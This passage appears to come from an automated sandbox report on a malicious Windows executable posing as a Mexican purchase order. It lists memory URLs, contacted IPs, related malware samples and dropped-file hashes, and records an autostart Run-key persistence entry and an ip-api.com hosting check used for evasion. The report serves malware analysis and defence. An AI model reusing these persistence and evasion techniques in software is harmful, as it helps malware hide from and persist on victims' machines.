                      		unknown
                      http://www.participa.gob.mx/chromecache_208.22.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://developer.mozilla.org/en-US/docs/CSS/displaychromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://jquery.org/licensechromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://jquery.com/chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://github.com/Pavich7/P-Browser-Builder/wiki/P-Browser-Builder-Guild#customizing-your-p-browserOrden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://translate.google.com/?hl=en&tab=wTvexplorerez.exe, 00000010.00000002.3848959756.000000000339F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://bugs.webkit.org/show_bug.cgi?id=137337chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://html.spec.whatwg.org/multipage/scripting.html#selector-enabledchromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://github.com/Pavich7/P-Browser-Builder/issues/new/chooseOrden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_192.22.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://promisesaplus.com/#point-48chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://calendar.google.com/calendar?tab=wcvexplorerez.exe, 00000010.00000002.3848959756.000000000339F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.csschromecache_192.22.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/jquery/sizzle/pull/225chromecache_190.22.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://html.spec.whatwg.org/multipage/infrastructure.html#strip-and-collapse-whitespacechromecache_190.22.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://bugzilla.mozilla.org/show_bug.cgi?id=491668chromecache_190.22.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/Pavich7/P-Browser-Builder-Resource/releases/latest/download/pbb-resource.zipOrden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://sizzlejs.com/chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://bugs.chromium.org/p/chromium/issues/detail?id=449857chromecache_190.22.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://pavichdev.ddns.net/api/v2-pbb/newsfeed/nf1_desc.txtOrden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://ip-api.com/line/?fields=hostingOrden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003969000.00000004.00000800.00020000.00000000.sdmp, Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3865481800.0000000004734000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3865481800.0000000004371000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3865481800.0000000004652000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4064362259.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4064362259.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000018.00000002.3511312688.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002921000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.google.com/Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2980414937.0000000002881000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3848959756.0000000003371000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4037955042.0000000002A4D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      18.244.18.27
                      		unknownUnited States
                      		16509AMAZON-02USfalse
                      23.41.168.139
                      		unknownUnited States
                      		6461ZAYO-6461USfalse
                      185.230.214.164
                      		unknownNetherlands
                      		41913COMPUTERLINEComputerlineSchlierbachSwitzerlandCHfalse
                      1.1.1.1
                      		unknownAustralia
                      		13335CLOUDFLARENETUSfalse
                      216.58.212.132
                      		unknownUnited States
                      		15169GOOGLEUSfalse
                      18.244.18.122
                      		unknownUnited States
                      		16509AMAZON-02USfalse
                      142.250.185.132
                      		unknownUnited States
                      		15169GOOGLEUSfalse
                      208.95.112.1
                      		unknownUnited States
                      		53334TUT-ASUSfalse
                      239.255.255.250
                      		unknownReserved
                      		unknownunknownfalse
                      142.250.186.100
                      		unknownUnited States
                      		15169GOOGLEUSfalse

                      Private

                      IP
                      192.168.2.11
                      127.0.0.1

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1463465
                      Start date and time:2024-06-27 08:54:06 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 11m 56s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:31
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Orden#46789_2024_Optoflux_mexico_sderls.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@57/111@0/12
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 96%
                      • Number of executed functions: 185
                      • Number of non-executed functions: 9
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 192.229.221.95, 93.184.221.240, 184.28.88.176, 162.159.61.3, 172.64.41.3, 172.217.16.195, 23.22.254.206, 52.202.204.11, 52.5.13.197, 54.227.187.23, 142.250.186.78, 64.233.167.84, 191.238.188.221, 34.104.35.123, 2.16.202.123, 95.101.54.195, 216.58.206.74, 142.250.181.234, 142.250.186.74, 142.250.186.170, 142.250.185.170, 142.250.186.138, 216.58.212.170, 142.250.185.74, 172.217.23.106, 142.250.185.202, 142.250.185.138, 216.58.206.42, 142.250.185.106, 142.250.186.42, 142.250.185.234, 142.250.184.202, 2.19.126.143, 2.19.126.149, 23.200.0.21, 23.200.0.33, 192.168.2.6, 142.250.184.227, 142.250.185.174
                      • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, slscr.update.microsoft.com, clientservices.googleapis.com, acroipm2.adobe.com, a1952.dscq.akamai.net, clients2.google.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, prodcfdiverifica.cloudapp.net, apps.identrust.com, clients1.google.com, client.wns.windows.com, fs.microsoft.com, identrust.edgesuite.net, accounts.google.com, content-autofill.googleapis.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com, geo2.adobe.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtCreateFile calls found.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      02:56:12API Interceptor43x Sleep call for process: Orden#46789_2024_Optoflux_mexico_sderls.exe modified
                      02:57:02API Interceptor84x Sleep call for process: vexplorerez.exe modified
                      02:57:12API Interceptor1x Sleep call for process: AcroCEF.exe modified
                      02:57:20API Interceptor1x Sleep call for process: Acrobat.exe modified
                      02:57:51API Interceptor69x Sleep call for process: InstallUtil.exe modified
                      08:56:30AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run vexplorerezz C:\Users\user\AppData\Roaming\vexplorerez.exe
                      08:56:38AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run vexplorerezz C:\Users\user\AppData\Roaming\vexplorerez.exe

                      QR Codes

                      SourceURL
                      Screenshothttps://verificacfdi.facturaelectronica.sat.gob.mx/?id=39CA617E-9953-41BD-9564-C41A1E1C5584&re=OOMM710314363&rr=PCM910225B86&tt=6090.00&fe=aUIAsQ==

                      LLM Input / Output

                      InputOutput
                      URL: https://verificacfdi.facturaelectronica.sat.gob.mx/?id=39CA617E-9953-41BD-9564-C41A1E1C5584&re=OOMM710314363&rr=PCM910225B86&tt=6090.00&fe=aUIAsQ== Model: Perplexity: mixtral-8x7b-instruct
                      {"loginform": false,"urgency": false,"captcha": true,"reasons": ["The webpage contains a CAPTCHA or anti-robot detection mechanism, as seen by the instruction 'Proporcione los digitos de la Imagen' which requires the user to input numbers from an image.","The text does not create a sense of urgency as it is a informational page about verifying fiscal documents.","The webpage does not contain a login form as there are no explicit requests for sensitive information such as passwords, email addresses, usernames, phone numbers or credit card numbers."]}
                      Title: Verificacin de Comprobantes Fiscales Digitales por Internet OCR: GOBERNO DE Trmites Gobierno MEXICO FACTURA ELECTRONICA A > Inicio HACIENDA Verificacin de comprobantes fiscales digitales por internet A travs de esta opcin, usted podr verificar si el comprobante fue certificado por el SAT Folio fiscal*: RFC emisor*: RFC receptor: 39CA61789953-41 BD-9564-C41. OOMM710314363 PCM910225386 Proporcione los digitos de la Imagen Verifir CFDI Datos obligatorios
                      URL: https://verificacfdi.facturaelectronica.sat.gob.mx Model: gpt-4o
                      ```json{  "phishing_score": 1,  "brands": "SAT (Servicio de Administracin Tributaria)",  "phishing": false,  "suspicious_domain": false,  "has_prominent_loginform": false,  "has_captcha": true,  "setechniques": false,  "has_suspicious_link": false,  "legitmate_domain": "sat.gob.mx",  "reasons": "The URL 'https://verificacfdi.facturaelectronica.sat.gob.mx' appears to be legitimate as it uses the official domain 'sat.gob.mx' associated with the Mexican tax authority (SAT). The webpage design and branding match the official SAT website. There are no prominent login forms requesting sensitive information such as passwords or emails, and the presence of a CAPTCHA adds a layer of security. There are no suspicious links or social usering techniques evident in the image. Therefore, it is concluded that this site is legitimate."}

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      1.1.1.1PO-230821_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                      • www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
                      AFfv8HpACF.exeGet hashmaliciousUnknownBrowse
                      • 1.1.1.1/
                      INVOICE_90990_PDF.exeGet hashmaliciousFormBookBrowse
                      • www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
                      Go.exeGet hashmaliciousUnknownBrowse
                      • 1.1.1.1/
                      18.244.18.122INQUIRY-13062024.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                        ORDEN DE COMPRA URGENTEsxlx..exeGet hashmaliciousFormBookBrowse
                          https://www.canva.com/design/DAGHzVFnwZE/G_g8Yp1JfGIicllbdLc4cA/view?utm_content=DAGHzVFnwZE&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                            https://yellatism.com/click.php?key=2240o76mk7oyoycyr074&cid=cphbldi9sch0sh7da130&zone=2353135-2517555085-3576986712&campaign=395161020&type=Push&age=11&creative_id=547520&campaign_id=108855&site_id=11517&placement_id=43113822&preset_id=500Get hashmaliciousUnknownBrowse
                              http://testing-1g0.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                23.41.168.139INQUIRY-13062024.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                  NEW ORDER.docx.docGet hashmaliciousUnknownBrowse
                                    FW IMPORTANT DVO 96FEJJ - Distribution_Notice.emlGet hashmaliciousHTMLPhisherBrowse
                                      http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                        http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                          Order Proforma Invoice.xlsGet hashmaliciousUnknownBrowse
                                            Dokumenti za pla#U0107anje.docx.docGet hashmaliciousUnknownBrowse
                                              AWB.xlsGet hashmaliciousUnknownBrowse
                                                Quotation.xlsGet hashmaliciousUnknownBrowse
                                                  DHL document LHER00.xlsGet hashmaliciousUnknownBrowse
                                                    185.230.214.164okPY77wv6E.exeGet hashmaliciousAgentTeslaBrowse
                                                      RFQ678903423_PROD_HASUE_de_Mexicso_MAT_MEX.exeGet hashmaliciousAgentTeslaBrowse
                                                        RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeGet hashmaliciousGuLoaderBrowse
                                                          RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeGet hashmaliciousAgentTeslaBrowse
                                                            INQUIRY#46789_MAY24_PLANEX_SERVICES_CONTRACTING_GOODS.exeGet hashmaliciousAgentTeslaBrowse
                                                              VBG dk Payment Receipt --doc87349281.batGet hashmaliciousRemcos, AgentTesla, DBatLoaderBrowse
                                                                18.244.18.27https://nekofile.eu.org/f8e2cb54931bf39d6c12eo5ncGet hashmaliciousUnknownBrowse
                                                                  https://www.canva.com/design/DAGHzVFnwZE/G_g8Yp1JfGIicllbdLc4cA/view?utm_content=DAGHzVFnwZE&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                    0af4a52e.0cce76886785b0ff1283f346.workers.devemailantonio.cataneo@axactor.com.msgGet hashmaliciousHTMLPhisherBrowse
                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                        https://mobile-sides-vertical-2.xv2.us/Get hashmaliciousUnknownBrowse

                                                                          Domains

                                                                          No context

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          AMAZON-02USINQUIRY-13062024.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                          • 18.244.18.32
                                                                          https://www.linkedin.com/redir/redirect?url=https%3A%2F%2Fassets-usa.mkt.dynamics.com%2F12f924f7-8132-ef11-8e4b-0022482ab022%2Fdigitalassets%2Fstandaloneforms%2F5d3fb7d5-9432-ef11-8409-7c1e520bad93&urlhash=FTy9&trk=public_profile-settings_topcard-websiteGet hashmaliciousUnknownBrowse
                                                                          • 18.244.18.32
                                                                          http://asteris.comGet hashmaliciousUnknownBrowse
                                                                          • 54.228.225.234
                                                                          https://www.google.com.br/url?q=//www.google.it/amp/s/newhopeaustralia.ubpages.com/fund-summary/Get hashmaliciousUnknownBrowse
                                                                          • 13.32.99.123
                                                                          AirWaybill_Document Pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • 76.223.105.230
                                                                          https://edworking.com/share/workspace/clxw0fp4e0tq913ofsrqas5otGet hashmaliciousHTMLPhisherBrowse
                                                                          • 18.245.31.89
                                                                          1Vkf7silOj.exeGet hashmaliciousLummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
                                                                          • 54.67.42.145
                                                                          jAyXs6UP5r.elfGet hashmaliciousUnknownBrowse
                                                                          • 52.31.185.135
                                                                          b4ngl4d3shS3N941.x86.elfGet hashmaliciousUnknownBrowse
                                                                          • 34.249.145.219
                                                                          TiXxNKsN4C.exeGet hashmaliciousNjratBrowse
                                                                          • 18.158.249.75
                                                                          CLOUDFLARENETUSOrder 000293884849900.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                          • 104.26.13.205
                                                                          https://kregeurope-my.sharepoint.com/:o:/g/personal/miguel_camino_kreg-europe_com/EozPcA50-69FlIOJAmjO4UIBZmHxAaxb-zbUcCeOEDUK3w?e=fP78tKGet hashmaliciousUnknownBrowse
                                                                          • 188.114.96.3
                                                                          PurchaseXContract.docGet hashmaliciousLokibotBrowse
                                                                          • 172.67.212.234
                                                                          b8khu7cOny.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 172.67.145.174
                                                                          http://asteris.comGet hashmaliciousUnknownBrowse
                                                                          • 172.67.20.8
                                                                          https://www.google.com.br/url?q=//www.google.it/amp/s/newhopeaustralia.ubpages.com/fund-summary/Get hashmaliciousUnknownBrowse
                                                                          • 172.64.146.119
                                                                          BRWgvKaqbg.exeGet hashmaliciousPureLog Stealer, RisePro Stealer, Vidar, zgRATBrowse
                                                                          • 104.26.4.15
                                                                          AirWaybill_Document Pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • 188.114.97.3
                                                                          https://edworking.com/share/workspace/clxw0fp4e0tq913ofsrqas5otGet hashmaliciousHTMLPhisherBrowse
                                                                          • 172.65.208.22
                                                                          1Vkf7silOj.exeGet hashmaliciousLummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
                                                                          • 172.67.167.249
                                                                          COMPUTERLINEComputerlineSchlierbachSwitzerlandCHokPY77wv6E.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 185.230.214.164
                                                                          https://bitbucket.oreaillyauto.com/Get hashmaliciousUnknownBrowse
                                                                          • 185.230.212.52
                                                                          https://show.zohopublic.com/publish/lbdok4d17ed2d1eb14856a7e4d9247a9cebd4Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                          • 89.36.170.147
                                                                          c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exeGet hashmaliciousSystemBCBrowse
                                                                          • 185.230.212.166
                                                                          http://workdrive.zohopublic.eu/file/efe6bcb0201f3a92140adacc604376ceb2b52Get hashmaliciousUnknownBrowse
                                                                          • 185.230.212.52
                                                                          RFQ678903423_PROD_HASUE_de_Mexicso_MAT_MEX.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 185.230.214.164
                                                                          http://isme-zcmp.campaign-view.euGet hashmaliciousUnknownBrowse
                                                                          • 185.230.212.52
                                                                          https://www.junglegstring.com/?wysija-page=1&controller=confirm&wysija-key=1c37c08e0ea53fdc22a8bedc342b6a0e&action=subscribe&wysijap=subscriptions&wysiconf=WyIxIl0=Get hashmaliciousUnknownBrowse
                                                                          • 89.36.170.147
                                                                          RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeGet hashmaliciousGuLoaderBrowse
                                                                          • 185.230.214.164
                                                                          RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 185.230.214.164
                                                                          ZAYO-6461USINQUIRY-13062024.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                          • 23.41.168.139
                                                                          NEW ORDER.docx.docGet hashmaliciousUnknownBrowse
                                                                          • 23.41.168.139
                                                                          http://cloudflare-6s0.pages.dev/Get hashmaliciousUnknownBrowse
                                                                          • 23.35.232.134
                                                                          http://dark-pine.mecayok955.workers.dev/Get hashmaliciousUnknownBrowse
                                                                          • 23.35.232.134
                                                                          ELECTRONIC RECEIPT_bpost.be.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 23.35.229.160
                                                                          http://worker-hk.simbacloud.workers.dev/Get hashmaliciousUnknownBrowse
                                                                          • 23.35.232.134
                                                                          http://ygkkk.qubin.link/Get hashmaliciousUnknownBrowse
                                                                          • 23.35.232.134
                                                                          https://larandeteknik.se/reports.phpGet hashmaliciousUnknownBrowse
                                                                          • 23.39.150.176
                                                                          https://tea02.pages.dev/Get hashmaliciousUnknownBrowse
                                                                          • 23.35.232.134
                                                                          https://bhgfr2.pages.dev/Get hashmaliciousUnknownBrowse
                                                                          • 23.35.232.134

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):298
                                                                          Entropy (8bit):5.153330671937552
                                                                          Encrypted:false
                                                                          SSDEEP:6:5PTLj+L+q2PN72nKuAl9OmbnIFUt8uPTLO1Zmw+uPTLYLVkwON72nKuAl9OmbjLJ:1j+L+vVaHAahFUt8S4/+SYLV5OaHAaSJ
                                                                          MD5:5039BC727FE261D3B582A2225861A775
                                                                          SHA1:72F9B9411AFD8451A0A2089697A927FAF679ACA4
                                                                          SHA-256:0B7E9BBD4FF4047770EBEFB55484C29A20C9FC16E8D63B502348CCB8A7433635
                                                                          SHA-512:F037AB0138DD168AB2EEA306370545BB7153F5FF1B86B03E1E380B225D649FCF66C7BE8658967CA7CA4DCDC69661A03471361E7579AB67498DCC6BFAD12DB4AD
                                                                          Malicious:false
                                                                          Preview:2024/06/27-02:57:04.030 137c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/06/27-02:57:04.032 137c Recovering log #3.2024/06/27-02:57:04.032 137c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):298
                                                                          Entropy (8bit):5.153330671937552
                                                                          Encrypted:false
                                                                          SSDEEP:6:5PTLj+L+q2PN72nKuAl9OmbnIFUt8uPTLO1Zmw+uPTLYLVkwON72nKuAl9OmbjLJ:1j+L+vVaHAahFUt8S4/+SYLV5OaHAaSJ
                                                                          MD5:5039BC727FE261D3B582A2225861A775
                                                                          SHA1:72F9B9411AFD8451A0A2089697A927FAF679ACA4
                                                                          SHA-256:0B7E9BBD4FF4047770EBEFB55484C29A20C9FC16E8D63B502348CCB8A7433635
                                                                          SHA-512:F037AB0138DD168AB2EEA306370545BB7153F5FF1B86B03E1E380B225D649FCF66C7BE8658967CA7CA4DCDC69661A03471361E7579AB67498DCC6BFAD12DB4AD
                                                                          Malicious:false
                                                                          Preview:2024/06/27-02:57:04.030 137c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/06/27-02:57:04.032 137c Recovering log #3.2024/06/27-02:57:04.032 137c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):339
                                                                          Entropy (8bit):5.14607787777548
                                                                          Encrypted:false
                                                                          SSDEEP:6:5PTLzQ+q2PN72nKuAl9Ombzo2jMGIFUt8uPTLBwgZmw+uPTLFQVkwON72nKuAl97:1s+vVaHAa8uFUt8Sj/+S+V5OaHAa8RJ
                                                                          MD5:FC617807BF06D89D9115336B532024D3
                                                                          SHA1:BE871FA7A511EF7AE69BE4FA095E47876B248204
                                                                          SHA-256:D3F115554799EC3B0F46A862153A58808CF1D8961E52ED9F4CA31C94807896AD
                                                                          SHA-512:91406FAC10C1925F247C8C302C2871D34DC5F0CDEE1D2725ABDF0BF90BAF98E6A4F5846176CB6E5981760E0021762F5E651108914FB8B8A6C04271074BD7CF86
                                                                          Malicious:false
                                                                          Preview:2024/06/27-02:57:04.115 edc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/06/27-02:57:04.116 edc Recovering log #3.2024/06/27-02:57:04.117 edc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):339
                                                                          Entropy (8bit):5.14607787777548
                                                                          Encrypted:false
                                                                          SSDEEP:6:5PTLzQ+q2PN72nKuAl9Ombzo2jMGIFUt8uPTLBwgZmw+uPTLFQVkwON72nKuAl97:1s+vVaHAa8uFUt8Sj/+S+V5OaHAa8RJ
                                                                          MD5:FC617807BF06D89D9115336B532024D3
                                                                          SHA1:BE871FA7A511EF7AE69BE4FA095E47876B248204
                                                                          SHA-256:D3F115554799EC3B0F46A862153A58808CF1D8961E52ED9F4CA31C94807896AD
                                                                          SHA-512:91406FAC10C1925F247C8C302C2871D34DC5F0CDEE1D2725ABDF0BF90BAF98E6A4F5846176CB6E5981760E0021762F5E651108914FB8B8A6C04271074BD7CF86
                                                                          Malicious:false
                                                                          Preview:2024/06/27-02:57:04.115 edc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/06/27-02:57:04.116 edc Recovering log #3.2024/06/27-02:57:04.117 edc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\68ee4b46-ed4a-4f81-b56b-983faad47c91.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:modified
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.967105522201735
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sqKsBdOg2H4caq3QYiubcP7E4T3y:Y2sRds6dMHz3QYhbA7nby
                                                                          MD5:FC7D5C2FE281D7590D158269E84325DA
                                                                          SHA1:A3F714DC4228164A07B4C50BF5BBCC26AC4C1248
                                                                          SHA-256:32B9F5344FF3EFD539BC45EAE7B3985DF198E522EDA0A169551C76BF439288C0
                                                                          SHA-512:4669F205A82115DE2864B18C9A6F8DC06BB38291405E0FC713B2F81C2287D64C7B31401B5A0CDCD0A656159017145A087DFA63408645847F8379B7F37256B614
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13364031436058397","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":142621},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.967105522201735
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sqKsBdOg2H4caq3QYiubcP7E4T3y:Y2sRds6dMHz3QYhbA7nby
                                                                          MD5:FC7D5C2FE281D7590D158269E84325DA
                                                                          SHA1:A3F714DC4228164A07B4C50BF5BBCC26AC4C1248
